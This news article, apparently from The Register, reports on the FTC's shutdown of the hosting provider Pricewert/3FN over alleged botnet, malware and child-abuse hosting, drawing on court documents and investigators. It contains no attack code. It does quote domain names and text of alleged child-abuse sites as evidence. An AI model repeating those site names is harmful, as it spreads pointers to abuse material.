“This content includes a witches’ brew of child pornography, botnet command and control servers, spyware, viruses, trojans, phishing-related sites, and pornography featuring violence, bestiality, and incest,” they wrote in court documents. “In addition to recruiting and willingly distributing this illegal, malicious and harmful content, Pricewert actively colludes with its criminal clientele in several areas, including the maintenance and deployment of networks of compromised computers known as botnets.”

This week’s action is the most significant shutdown since the shuttering in November of McColo, another Northern California-based service provider with ties to online crime. In the months following the takedown, spam volume dropped by as much as 40 percent.

“We suspect it’s been programmed in such a way that when the command and control goes down it just continues to execute” old instructions, said Matt Sergeant, a senior antispam technologist at MessageLabs, which was recently purchased by Symantec. “That gives the spammers time to find a new command and control host. McColo taught spammers that they needed multiple command and controls and not to put all their eggs in one basket.”

Court documents alleged a litany of illegal services that 3FN operators actively offered. They include:

The site allegedly communicated with malicious software hosted at McColo. Investigators who sifted through the contents of the latter shuttered provider found instant message logs in which high-level 3FN employees provided technical support to customers trying to configure botnets with as many as 200,000 nodes.

A NASA investigator probing intrusions to the space agency’s networks found 22 separate attacks on NASA computers originating from IP addresses controlled by 3FN, including five this year, one as recently as April. NASA estimates it has spent more than $14,000 to repair the damage.

A separate investigator managed to peer inside 3FN after reverse engineering malware masquerading as a video player that was hosted by the provider. What he found were logs showing that thousands of computers had been compromised by the malicious code. He also located more than 40 websites hosted by 3FN that are possible hosts of child pornography, some with names such as little-incest.com and littles-raped.com. Using a text-only browser to visit some of the sites, he found text promising “illegal photos of little girls” and “very little schoolgirls raped.”

One of the biggest complaints among white hat hackers is the difficulty of shutting down networks that flagrantly violate the law. This week’s action is the first time the FTC has used its congressional mandate to protect US consumers to sever a service provider suspected of illegal activity.

The temporary restraining order, issued by US District Judge Ronald M. White of San Jose, also freezes all of the company’s assets. A hearing in the case is scheduled for June 15.

Assistance in the case came from a variety of sources including computer forensics expert Gary Warner from the University of Alabama at Birmingham, NASA’s office of the inspector general, the National Center for Missing and Exploited Children, the Shadowserver Foundation, Symantec and the Spamhaus project.

Credit: The Register
